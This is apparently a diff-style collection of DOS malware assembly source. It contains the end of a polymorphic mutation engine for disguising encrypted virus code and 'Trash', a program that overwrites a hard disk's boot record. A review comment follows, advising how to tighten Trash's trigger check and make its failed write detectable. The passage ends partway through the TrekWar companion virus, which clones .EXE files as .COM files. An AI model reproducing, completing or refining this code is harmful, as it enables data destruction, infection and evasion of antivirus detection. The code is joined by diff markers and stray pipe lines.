cmp dl,4 ;BX?
|
||||
jne is_not_bx
|
||||
call add_ind
|
||||
is_not_bx: test dl,0C ;A*?
|
||||
pushf
|
||||
jnz is_not_a
|
||||
test bl,80 ;A* or D*?
|
||||
jz is_not_a
|
||||
add al,2
|
||||
|
||||
is_not_a: call alter ;insert the MOV
|
||||
|
||||
popf ;A*?
|
||||
jnz is_not_a2
|
||||
mov ax,word ptr ds:[xor_val]
|
||||
jmp short sss
|
||||
|
||||
is_not_a2: test dl,8 ;B*?
|
||||
jnz is_not_b
|
||||
mov si,offset where_len
|
||||
test dl,2
|
||||
jz is_not_bh
|
||||
add si,2
|
||||
is_not_bh: mov word ptr ds:[si],di
|
||||
jmp short sss
|
||||
|
||||
is_not_b: mov ax,cx ;C*
|
||||
test bl,10 ;byte or word encryption?
|
||||
jz sss
|
||||
inc ax ;only half the number of bytes
|
||||
shr ax,1
|
||||
sss: test dl,3 ;byte or word register?
|
||||
jz is_x
|
||||
test dl,2 ;*H?
|
||||
jz is_not_h
|
||||
xchg al,ah
|
||||
is_not_h: stosb
|
||||
ret
|
||||
|
||||
is_x: stosw
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* insert MOV or alternative for MOV
|
||||
;****************************************************************************
|
||||
|
||||
alter: push bx
|
||||
push cx
|
||||
push ax
|
||||
call rnd_get
|
||||
xchg ax,bx
|
||||
pop ax
|
||||
test bl,3 ;use alternative for MOV?
|
||||
jz no_alter
|
||||
|
||||
push ax
|
||||
and bx,0F
|
||||
and al,08
|
||||
shl ax,1
|
||||
or bx,ax
|
||||
pop ax
|
||||
|
||||
and al,7
|
||||
mov cl,9
|
||||
xchg ax,cx
|
||||
mul cl
|
||||
|
||||
add ax,30C0
|
||||
xchg al,ah
|
||||
test bl,4
|
||||
jz no_sub
|
||||
mov al,28
|
||||
no_sub: call maybe_2
|
||||
stosw
|
||||
|
||||
mov al,80
|
||||
call maybe_2
|
||||
stosb
|
||||
|
||||
mov ax,offset add_mode
|
||||
xchg ax,bx
|
||||
and ax,3
|
||||
xlat
|
||||
|
||||
add al,cl
|
||||
no_alter: stosb
|
||||
pop cx
|
||||
pop bx
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* insert ADD AX,xxxx
|
||||
;****************************************************************************
|
||||
|
||||
do_add_ax: push cx
|
||||
mov si,offset add_val ;save add-value here
|
||||
mov word ptr ds:[si],0
|
||||
mov ax,bx
|
||||
and ax,8110
|
||||
xor ax,8010
|
||||
jnz no_add_ax ;use ADD?
|
||||
|
||||
mov ax,bx
|
||||
xor ah,ah
|
||||
mov cl,3
|
||||
div cl
|
||||
or ah,ah
|
||||
jnz no_add_ax ;use ADD?
|
||||
|
||||
test bl,80
|
||||
jnz do_81C2 ;AX or DX?
|
||||
mov al,5
|
||||
stosb
|
||||
jmp short do_add0
|
||||
do_81C2: mov ax,0C281
|
||||
stosw
|
||||
do_add0: call rnd_get
|
||||
mov word ptr ds:[si],ax
|
||||
stosw
|
||||
no_add_ax: pop cx
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* generate encryption command
|
||||
;****************************************************************************
|
||||
|
||||
do_xor: test byte ptr ds:[flags],1
|
||||
jz no_cs
|
||||
mov al,2E ;insert CS: instruction
|
||||
stosb
|
||||
|
||||
no_cs: test bh,80 ;type of XOR command
|
||||
jz xor1
|
||||
|
||||
call get_xor ;encrypt with register
|
||||
call do_carry
|
||||
call save_it
|
||||
xor ax,ax
|
||||
test bl,80
|
||||
jz xxxx
|
||||
add al,10
|
||||
xxxx: call add_dir
|
||||
test bh,8
|
||||
jnz yyyy
|
||||
stosb
|
||||
ret
|
||||
|
||||
yyyy: or al,80
|
||||
stosb
|
||||
call rnd_get
|
||||
stosw
|
||||
mov word ptr ds:[xor_offset],ax
|
||||
ret
|
||||
|
||||
xor1: mov al,080 ;encrypt with value
|
||||
call save_it
|
||||
call get_xor
|
||||
call do_carry
|
||||
call xxxx
|
||||
mov ax,word ptr ds:[xor_val]
|
||||
test bl,10
|
||||
jmp byte_word
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* generate increase/decrease command
|
||||
;****************************************************************************
|
||||
|
||||
do_add: test bl,8 ;no CMPSW/SCASW if BX is used
|
||||
jz da0
|
||||
test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW
|
||||
jnz do_cmpsw
|
||||
|
||||
da0: test bh,4 ;ADD/SUB or INC/DEC?
|
||||
jz add1
|
||||
|
||||
mov al,40 ;INC/DEC
|
||||
test bh,1 ;up or down?
|
||||
jz add0
|
||||
add al,8
|
||||
add0: call add_ind
|
||||
stosb
|
||||
test bl,10 ;byte or word?
|
||||
jz return
|
||||
stosb ;same instruction again
|
||||
return: ret
|
||||
|
||||
add1: test bh,40 ;ADD/SUB
|
||||
jz no_clc2 ;carry?
|
||||
mov al,0F8 ;insert CLC
|
||||
stosb
|
||||
no_clc2: mov al,083
|
||||
stosb
|
||||
mov al,0C0
|
||||
test bh,1 ;up or down?
|
||||
jz add2
|
||||
mov al,0E8
|
||||
add2: test bh,40 ;carry?
|
||||
jz no_ac2
|
||||
and al,0CF
|
||||
or al,10
|
||||
no_ac2: call add_ind
|
||||
stosb
|
||||
mov al,1 ;value to add/sub
|
||||
save_it: call add_1
|
||||
stosb
|
||||
ret
|
||||
|
||||
do_cmpsw: test bh,1 ;up or down?
|
||||
jz no_std
|
||||
mov al,0FDh ;insert STD
|
||||
stosb
|
||||
no_std: test bh,4 ;CMPSW or SCASW?
|
||||
jz normal_cmpsw
|
||||
test bl,4 ;no SCASW if SI is used
|
||||
jnz do_scasw
|
||||
|
||||
normal_cmpsw: mov al,0A6 ;CMPSB
|
||||
jmp short save_it
|
||||
do_scasw: mov al,0AE ;SCASB
|
||||
jmp short save_it
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* generate loop command
|
||||
;****************************************************************************
|
||||
|
||||
do_loop: test bh,1 ;no JNE if couting down
|
||||
jnz loop_loop ; (prefetch bug!)
|
||||
call rnd_get
|
||||
test al,1 ;LOOPNZ/LOOP or JNE?
|
||||
jnz cx_loop
|
||||
|
||||
loop_loop: mov al,0E0
|
||||
test bh,1A ;LOOPNZ or LOOP?
|
||||
jz ll0 ; no LOOPNZ if xor-offset
|
||||
add al,2 ; no LOOPNZ if CMPSW/SCASW
|
||||
ll0: stosb
|
||||
mov ax,dx
|
||||
sub ax,di
|
||||
dec ax
|
||||
stosb
|
||||
ret
|
||||
|
||||
cx_loop: test bh,10 ;SUB CX or DEC CX?
|
||||
jnz cxl_dec
|
||||
mov ax,0E983
|
||||
stosw
|
||||
mov al,1
|
||||
stosb
|
||||
jmp short do_jne
|
||||
|
||||
cxl_dec: mov al,49
|
||||
stosb
|
||||
do_jne: mov al,75
|
||||
jmp short ll0
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* add value to AL depending on register type
|
||||
;****************************************************************************
|
||||
|
||||
add_dir: mov si,offset dir_change
|
||||
jmp short xx1
|
||||
|
||||
add_ind: mov si,offset ind_change
|
||||
xx1: push bx
|
||||
shr bl,1
|
||||
shr bl,1
|
||||
and bx,3
|
||||
add al,byte ptr ds:[bx+si]
|
||||
pop bx
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* mov encryption command byte to AL
|
||||
;****************************************************************************
|
||||
|
||||
get_xor: push bx
|
||||
mov ax,offset how_mode
|
||||
xchg ax,bx
|
||||
and ax,3
|
||||
xlat
|
||||
pop bx
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* change ADD into ADC
|
||||
;****************************************************************************
|
||||
|
||||
do_carry: test bl,2 ;ADD/SUB used for encryption?
|
||||
jz no_ac
|
||||
test bh,20 ;carry with (encr.) ADD/SUB?
|
||||
jz no_ac
|
||||
and al,0CF
|
||||
or al,10
|
||||
no_ac: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* change AL (byte/word)
|
||||
;****************************************************************************
|
||||
|
||||
add_1: test bl,10
|
||||
jz add_1_ret
|
||||
inc al
|
||||
add_1_ret: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* change AL (byte/word)
|
||||
;****************************************************************************
|
||||
|
||||
maybe_2: call add_1
|
||||
cmp al,81 ;can't touch this
|
||||
je maybe_not
|
||||
push ax
|
||||
call rnd_get
|
||||
test al,1
|
||||
pop ax
|
||||
jz maybe_not
|
||||
add al,2
|
||||
maybe_not: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* get random nop (or not)
|
||||
;****************************************************************************
|
||||
|
||||
do_nop: test byte ptr ds:[flags],2
|
||||
jz no_nop
|
||||
yes_nop: call rnd_get
|
||||
test al,3
|
||||
jz nop8
|
||||
test al,2
|
||||
jz nop16
|
||||
test al,1
|
||||
jz nop16x
|
||||
no_nop: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* Insert random instructions
|
||||
;****************************************************************************
|
||||
|
||||
do_junk: test byte ptr ds:[flags],4
|
||||
jz no_junk
|
||||
call rnd_get ;put a random number of
|
||||
and ax,0F ; dummy instructions before
|
||||
inc ax ; decryptor
|
||||
xchg ax,cx
|
||||
junk_loop: call junk
|
||||
loop junk_loop
|
||||
no_junk: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* get rough random nop (may affect register values)
|
||||
;****************************************************************************
|
||||
|
||||
junk: call rnd_get
|
||||
and ax,1E
|
||||
jmp short aa0
|
||||
nop16x: call rnd_get
|
||||
and ax,06
|
||||
aa0: xchg ax,si
|
||||
call rnd_get
|
||||
jmp word ptr ds:[si+junkcals]
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* NOP and junk addresses
|
||||
;****************************************************************************
|
||||
|
||||
junkcals dw offset nop16x0
|
||||
dw offset nop16x1
|
||||
dw offset nop16x2
|
||||
dw offset nop16x3
|
||||
dw offset nop8
|
||||
dw offset nop16
|
||||
dw offset junk6
|
||||
dw offset junk7
|
||||
dw offset junk8
|
||||
dw offset junk9
|
||||
dw offset junkA
|
||||
dw offset junkB
|
||||
dw offset junkC
|
||||
dw offset junkD
|
||||
dw offset junkE
|
||||
dw offset junkF
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* NOP and junk routines
|
||||
;****************************************************************************
|
||||
|
||||
nop16x0: and ax,000F ;J* 0000 (conditional)
|
||||
or al,70
|
||||
stosw
|
||||
ret
|
||||
|
||||
|
||||
nop16x1: mov al,0EBh ;JMP xxxx / junk
|
||||
and ah,07
|
||||
inc ah
|
||||
stosw
|
||||
xchg al,ah ;get lenght of bullshit
|
||||
cbw
|
||||
jmp fill_bullshit
|
||||
|
||||
|
||||
nop16x2: call junkD ;XCHG AX,reg / XCHG AX,reg
|
||||
stosb
|
||||
ret
|
||||
|
||||
|
||||
nop16x3: call junkF ;INC / DEC or DEC / INC
|
||||
xor al,8
|
||||
stosb
|
||||
ret
|
||||
|
||||
|
||||
nop8: push bx ;8-bit NOP
|
||||
and al,7
|
||||
mov bx,offset nop_data8
|
||||
xlat
|
||||
stosb
|
||||
pop bx
|
||||
ret
|
||||
|
||||
|
||||
nop16: push bx ;16-bit NOP
|
||||
and ax,0303
|
||||
mov bx,offset nop_data16
|
||||
xlat
|
||||
add al,ah
|
||||
stosb
|
||||
call rnd_get
|
||||
and al,7
|
||||
mov bl,9
|
||||
mul bl
|
||||
add al,0C0
|
||||
stosb
|
||||
pop bx
|
||||
ret
|
||||
|
||||
|
||||
junk6: push cx ;CALL xxxx / junk / POP reg
|
||||
mov al,0E8
|
||||
and ah,0F
|
||||
inc ah
|
||||
stosw
|
||||
xor al,al
|
||||
stosb
|
||||
xchg al,ah
|
||||
call fill_bullshit
|
||||
call do_nop
|
||||
call rnd_get ;insert POP reg
|
||||
and al,7
|
||||
call no_sp
|
||||
mov cx,ax
|
||||
or al,58
|
||||
stosb
|
||||
|
||||
test ch,3 ;more?
|
||||
jnz junk6_ret
|
||||
|
||||
call do_nop
|
||||
mov ax,0F087 ;insert XCHG SI,reg
|
||||
or ah,cl
|
||||
test ch,8
|
||||
jz j6_1
|
||||
mov al,8Bh
|
||||
j6_1: stosw
|
||||
|
||||
call do_nop
|
||||
push bx
|
||||
call rnd_get
|
||||
xchg ax,bx
|
||||
and bx,0F7FBh ;insert XOR [SI],xxxx
|
||||
or bl,8
|
||||
call do_xor
|
||||
pop bx
|
||||
junk6_ret: pop cx
|
||||
ret
|
||||
|
||||
|
||||
junk7: and al,0F ;MOV reg,xxxx
|
||||
or al,0B0
|
||||
call no_sp
|
||||
stosb
|
||||
test al,8
|
||||
pushf
|
||||
call rnd_get
|
||||
popf
|
||||
jmp short byte_word
|
||||
|
||||
|
||||
junk8: and ah,39 ;DO r/m,r(8/16)
|
||||
or al,0C0
|
||||
call no_sp
|
||||
xchg al,ah
|
||||
stosw
|
||||
ret
|
||||
|
||||
|
||||
junk9: and al,3Bh ;DO r(8/16),r/m
|
||||
or al,2
|
||||
and ah,3F
|
||||
call no_sp2
|
||||
call no_bp
|
||||
stosw
|
||||
ret
|
||||
|
||||
|
||||
junkA: and ah,1 ;DO rm,xxxx
|
||||
or ax,80C0
|
||||
call no_sp
|
||||
xchg al,ah
|
||||
stosw
|
||||
test al,1
|
||||
pushf
|
||||
call rnd_get
|
||||
popf
|
||||
jmp short byte_word
|
||||
|
||||
|
||||
junkB: call nop8 ;NOP / LOOP
|
||||
mov ax,0FDE2
|
||||
stosw
|
||||
ret
|
||||
|
||||
|
||||
junkC: and al,09 ;CMPS* or SCAS*
|
||||
test ah,1
|
||||
jz mov_test
|
||||
or al,0A6
|
||||
stosb
|
||||
ret
|
||||
mov_test: or al,0A0 ;MOV AX,[xxxx] or TEST AX,xxxx
|
||||
stosb
|
||||
cmp al,0A8
|
||||
pushf
|
||||
call rnd_get
|
||||
popf
|
||||
jmp short byte_word
|
||||
|
||||
|
||||
junkD: and al,07 ;XCHG AX,reg
|
||||
or al,90
|
||||
call no_sp
|
||||
stosb
|
||||
ret
|
||||
|
||||
|
||||
junkE: and ah,07 ;PUSH reg / POP reg
|
||||
or ah,50
|
||||
mov al,ah
|
||||
or ah,08
|
||||
stosw
|
||||
ret
|
||||
|
||||
|
||||
junkF: and al,0F ;INC / DEC
|
||||
or al,40
|
||||
call no_sp
|
||||
stosb
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* store a byte or a word
|
||||
;****************************************************************************
|
||||
|
||||
byte_word: jz only_byte
|
||||
stosw
|
||||
ret
|
||||
|
||||
only_byte: stosb
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* don't fuck with SP!
|
||||
;****************************************************************************
|
||||
|
||||
no_sp: push ax
|
||||
and al,7
|
||||
cmp al,4
|
||||
pop ax
|
||||
jnz no_sp_ret
|
||||
and al,0FBh
|
||||
no_sp_ret: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* don't fuck with SP!
|
||||
;****************************************************************************
|
||||
|
||||
no_sp2: push ax
|
||||
and ah,38
|
||||
cmp ah,20
|
||||
pop ax
|
||||
jnz no_sp2_ret
|
||||
xor ah,20
|
||||
no_sp2_ret: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* don't use [BP+..]
|
||||
;****************************************************************************
|
||||
|
||||
no_bp: test ah,4
|
||||
jnz no_bp2
|
||||
and ah,0FDh
|
||||
ret
|
||||
|
||||
no_bp2: push ax
|
||||
and ah,7
|
||||
cmp ah,6
|
||||
pop ax
|
||||
jnz no_bp_ret
|
||||
or ah,1
|
||||
no_bp_ret: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* write byte for JMP/CALL and fill with random bullshit
|
||||
;****************************************************************************
|
||||
|
||||
fill_bullshit: push cx
|
||||
xchg ax,cx
|
||||
bull_lup: call rnd_get
|
||||
stosb
|
||||
loop bull_lup
|
||||
pop cx
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* random number generator (stolen from 'Bomber')
|
||||
;****************************************************************************
|
||||
|
||||
rnd_init: push cx
|
||||
call rnd_init0 ;init
|
||||
and ax,000F
|
||||
inc ax
|
||||
xchg ax,cx
|
||||
random_lup: call rnd_get ;call random routine a few
|
||||
loop random_lup ; times to 'warm up'
|
||||
pop cx
|
||||
ret
|
||||
|
||||
rnd_init0: push dx ;initialize generator
|
||||
push cx
|
||||
mov ah,2C
|
||||
int 21
|
||||
in al,40
|
||||
mov ah,al
|
||||
in al,40
|
||||
xor ax,cx
|
||||
xor dx,ax
|
||||
jmp short move_rnd
|
||||
|
||||
rnd_get: push dx ;calculate a random number
|
||||
push cx
|
||||
push bx
|
||||
mov ax,0 ;will be: mov ax,xxxx
|
||||
mov dx,0 ; and mov dx,xxxx
|
||||
mov cx,7
|
||||
rnd_lup: shl ax,1
|
||||
rcl dx,1
|
||||
mov bl,al
|
||||
xor bl,dh
|
||||
jns rnd_l2
|
||||
inc al
|
||||
rnd_l2: loop rnd_lup
|
||||
pop bx
|
||||
|
||||
move_rnd: mov word ptr ds:[rnd_get+4],ax
|
||||
mov word ptr ds:[rnd_get+7],dx
|
||||
mov al,dl
|
||||
pop cx
|
||||
pop dx
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* tables for engine
|
||||
;****************************************************************************
|
||||
|
||||
; AX AL AH (BX) BL BH CX CL CH
|
||||
mov_byte db 0B8, 0B0, 0B4, 0, 0B8, 0B3, 0B7, 0, 0B9, 0B1, 0B5
|
||||
|
||||
; nop clc stc cmc cli cld incbp decbp
|
||||
nop_data8 db 90, 0F8, 0F9, 0F5, 0FA, 0FC, 45, 4Dh
|
||||
|
||||
; or and xchg mov
|
||||
nop_data16 db 8, 20, 84, 88
|
||||
|
||||
; bl/bh, bx, si di
|
||||
dir_change db 07, 07, 04, 05
|
||||
ind_change db 03, 03, 06, 07
|
||||
|
||||
|
||||
; xor xor add sub
|
||||
how_mode db 30, 30, 00, 28
|
||||
|
||||
; ? add xor or
|
||||
add_mode db 0, 0C8, 0F0, 0C0
|
||||
|
||||
tpe_bottom equ $
|
||||
|
||||
end TPE12
@ -0,0 +1,169 @@
|
|||
page ,132
|
||||
title Trash - smashes the boot record on the first hard disk
|
||||
name TRASH
|
||||
|
||||
.radix 16
|
||||
|
||||
code segment
|
||||
assume cs:code,ds:code
|
||||
|
||||
org 100
|
||||
|
||||
CODEX equ 0C000 ; Or use 0300 when tracing DOS
|
||||
|
||||
CR equ 0Dh
|
||||
LF equ 0A
|
||||
|
||||
start:
|
||||
jmp do_it
|
||||
|
||||
oldint1 dd ?
|
||||
newintx dd ?
|
||||
oldintx dd ?
|
||||
trace db 1
|
||||
found db 0
|
||||
buffer db 200 dup (0)
|
||||
message db CR,LF,'********** W A R N I N G ! ! ! **********',CR,LF,CR,LF
|
||||
db 'This program, when run, will zero (DESTROY!) the',CR,LF
|
||||
db 'master boot record of your first hard disk.',CR,LF,CR,LF
|
||||
db 'The purpose of this is to test the antivirus software,',CR,LF
|
||||
db 'so be sure you have installed your favourite',CR,LF
|
||||
db 'protecting program before running this one!',CR,LF
|
||||
db "(It's almost sure it will fail to protect you anyway!)",CR,LF
|
||||
db CR,LF,'Press any key to abort, or',CR,LF
|
||||
db 'press Ctrl-Alt-RightShift-F5 to proceed (at your own risk!) $'
|
||||
warned db CR,LF,CR,LF,'Allright, you were warned!',CR,LF,'$'
|
||||
|
||||
do_it:
|
||||
mov ax,600 ; Clear the screen by scrolling it up
|
||||
mov bh,7
|
||||
mov dx,1950
|
||||
xor cx,cx
|
||||
int 10
|
||||
|
||||
mov ah,0F ; Get the current video mode
|
||||
int 10 ; (the video page, more exactly)
|
||||
|
||||
mov ah,2 ; Home the cursor
|
||||
xor dx,dx
|
||||
int 10
|
||||
|
||||
mov ah,9 ; Print a warning message
|
||||
mov dx,offset message
|
||||
int 21
|
||||
|
||||
mov ax,0C08 ; Flush the keyboard and get a char
|
||||
int 21
|
||||
cmp al,0 ; Extendet ASCII?
|
||||
jne quit1 ; Exit if not
|
||||
mov ah,8 ; Get the key code
|
||||
int 21
|
||||
cmp al,6C ; Shift-F5?
|
||||
jne quit1 ; Exit if not
|
||||
mov ah,2 ; Get keyboard shift status
|
||||
int 16
|
||||
and al,1101b ; Ctrl-Alt-RightShift?
|
||||
jnz proceed ; Proceed if so
|
||||
quit1:
|
||||
jmp quit ; Otherwise exit
|
||||
|
||||
proceed:
|
||||
mov ah,9 ; Print the last message
|
||||
mov dx,offset warned
|
||||
int 21
|
||||
|
||||
mov ax,3501 ; Get interrupt vector 1 (single steping)
|
||||
int 21
|
||||
mov word ptr oldint1,bx
|
||||
mov word ptr oldint1+2,es
|
||||
|
||||
mov ax,2501 ; Set new INT 1 handler
|
||||
mov dx,offset newint1
|
||||
int 21
|
||||
|
||||
mov ax,3513 ; Get interrupt vector 13
|
||||
int 21
|
||||
mov word ptr oldintx,bx
|
||||
mov word ptr oldintx+2,es
|
||||
mov word ptr newintx,bx
|
||||
mov word ptr newintx+2,es
|
||||
|
||||
; The following code is sacred in it's present form.
|
||||
; To change it would cause volcanos to errupt,
|
||||
; the ground to shake, and program not to run!
|
||||
|
||||
mov ax,200
|
||||
push ax
|
||||
push cs
|
||||
mov ax,offset done
|
||||
push ax
|
||||
mov ax,100
|
||||
push ax
|
||||
push cs
|
||||
mov ax,offset faddr
|
||||
push ax
|
||||
mov ah,55
|
||||
iret
|
||||
|
||||
assume ds:nothing
|
||||
|
||||
faddr:
|
||||
jmp oldintx
|
||||
|
||||
newint1:
|
||||
push bp
|
||||
mov bp,sp
|
||||
cmp trace,0
|
||||
jne search
|
||||
exit:
|
||||
and [bp+6],not 100
|
||||
exit1:
|
||||
pop bp
|
||||
iret
|
||||
search:
|
||||
cmp [bp+4],CODEX
|
||||
jb exit1
|
||||
;Or use ja if you want to trace DOS-owned interrupt
|
||||
push ax
|
||||
mov ax,[bp+4]
|
||||
mov word ptr newintx+2,ax
|
||||
mov ax,[bp+2]
|
||||
mov word ptr newintx,ax
|
||||
pop ax
|
||||
mov found,1
|
||||
mov trace,0
|
||||
jmp exit
|
||||
|
||||
assume ds:code
|
||||
done:
|
||||
mov trace,0
|
||||
push ds
|
||||
mov ax,word ptr oldint1+2
|
||||
mov dx,word ptr oldint1
|
||||
mov ds,ax
|
||||
mov ax,2501 ; Restore old INT 1 handler
|
||||
int 21
|
||||
pop ds
|
||||
|
||||
; Code beyong this point is not sacred...
|
||||
; It may be perverted in any manner by any pervert.
|
||||
|
||||
cmp found,1 ; See if original INT 13 handler found
|
||||
jne quit ; Exit if not
|
||||
push ds
|
||||
pop es ; Restore ES
|
||||
|
||||
mov ax,301 ; Write 1 sector
|
||||
mov cx,1 ; Cylinder 0, sector 1
|
||||
mov dx,80 ; Head 0, drive 80h
|
||||
mov bx,offset buffer
|
||||
pushf ; Simulate INT 13
|
||||
call newintx ; Do it
|
||||
|
||||
quit:
|
||||
mov ax,4C00 ; Exit program
|
||||
int 21
|
||||
|
||||
code ends
|
||||
end start
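Review bot: The interlock at `and al,1101b` / `jnz proceed` (right after the INT 16h/AH=2 shift-status call) lets the destructive path run when any one of Ctrl, Alt or Right-Shift is held, not the Ctrl-Alt-RightShift combination the warning text promises, because `jnz` only checks that the masked value is non-zero. Requiring all three means comparing the masked value against the mask: `and al,1101b` / `cmp al,1101b` / `jne quit1`. Note too that `.radix 16` is in effect and MASM-style assemblers may read a trailing `b` as a hex digit under that radix, so `1101b` should be confirmed to assemble as the binary mask intended (writing it as `0Dh` removes the doubt). Separately, the `call newintx` write is never checked for carry, so a failed MBR write exits with the same status as a successful one; a `jc` to an error message there would make the outcome of the test observable.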
|
||||
|
|
@ -0,0 +1,185 @@
|
|||
;TREKWAR virus - we were overjoyed at Crypt Newsletter when Goose showed
|
||||
;us his update of CloneWar, TrekWar. Alert readers will remember ACME,
|
||||
;the musical companion based on ZENO, a relative of CloneWar.
|
||||
;So here it is!
|
||||
;TrekWar
|
||||
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||||
;³ Assembly Source Listing for TrekWar Companion Virus ³
|
||||
;³ Copyright (c) 1993 T.R.E.K. All Rights Reserved. :) ³
|
||||
;ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
|
||||
;³ The TrekWar is a simple modification of the Clonewar V2 companion virus; ³
|
||||
;³ for all you trekkers out there... For those of you who, heaven forbid, do ³
|
||||
;³ not know what the words below mean, they are the words to the old series ³
|
||||
;³ opening music of Star Trek... ³
|
||||
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||||
|
||||
CSEG SEGMENT
|
||||
ASSUME CS:CSEG,DS:NOTHING
|
||||
|
||||
ORG 100H
|
||||
|
||||
START:
|
||||
jmp VIR_BEGIN ;lets get moving...
|
||||
|
||||
db "",13,10
|
||||
db "",13,10
|
||||
db "Beyond",13,10 ;blah blah blah
|
||||
db "The rim of the star-light",13,10
|
||||
db "My love",13,10
|
||||
db "Is wand'ring in star-flight",13,10
|
||||
db "I know",13,10
|
||||
db "He'll find in star-clustered reaches",13,10
|
||||
db "Love",13,10
|
||||
db "Strange love a star woman teaches.",13,10
|
||||
db "I know",13,10
|
||||
db "His journey ends never",13,10
|
||||
db "His star trek",13,10
|
||||
db "Will go on forever.",13,10
|
||||
db "But tell him",13,10
|
||||
db "While he wanders his starry sea",13,10
|
||||
db "Remember, remember me."
|
||||
db "",13,10
|
||||
db "",13,10
|
||||
|
||||
db "[TrekWar] " ;what the heck, its only a few bytes!?
|
||||
WILDCARD DB "*.EXE",0
|
||||
FILE_EXT DB "COM",0
|
||||
FILE_FOUND DB 12 DUP(' '), 0
|
||||
FILE_CREATE DB 12 DUP(' '), 0
|
||||
SEARCH_ATTRIB DW 17H
|
||||
NUM_INFECT DW 0
|
||||
|
||||
|
||||
My_Cmd:
|
||||
CMD_LEN DB 13
|
||||
FILE_CLONE DB 12 DUP (' '), 0
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; Read all the directory filenames and store as records in buffer.
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
Vir_begin:
|
||||
|
||||
mov sp,offset STACK_HERE ;move stack down
|
||||
mov bx,sp
|
||||
add bx,15
|
||||
mov cl,4
|
||||
shr bx,cl
|
||||
mov ah,4ah ;deallocate rest of memory
|
||||
int 21h
|
||||
|
||||
mov di,OFFSET FILE_CLONE ;Point to buffer.
|
||||
mov si,OFFSET FILE_FOUND
|
||||
mov cx,12
|
||||
rep movsb
|
||||
|
||||
Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search
|
||||
mov cx,SEARCH_ATTRIB
|
||||
|
||||
mov ah,4Eh ;find first matching file
|
||||
int 21h
|
||||
|
||||
jc EXIT ;If empty directory, exit
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
Store_name:
|
||||
|
||||
mov di,OFFSET FILE_FOUND ;Point to buffer.
|
||||
mov si,158 ;stow the file found in buffer
|
||||
mov cx,12
|
||||
rep movsb
|
||||
|
||||
mov di,OFFSET FILE_CREATE ;Point to buffer.
|
||||
mov si,158
|
||||
mov cx,12
|
||||
rep movsb
|
||||
|
||||
cld
|
||||
mov di,OFFSET FILE_CREATE
|
||||
mov al,'.'
|
||||
mov cx,9
|
||||
repne scasb ;find the '.'
|
||||
|
||||
mov si,OFFSET FILE_EXT
|
||||
mov cx,3
|
||||
rep movsb ;replace the .EXE with .COM
|
||||
;from buffer
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
Check_file: ;does the file exist?
|
||||
mov dx,OFFSET FILE_CREATE
|
||||
xor cx,cx
|
||||
mov ax,3d00h ;Open file, read only
|
||||
int 21h
|
||||
jnc find_next
|
||||
|
||||
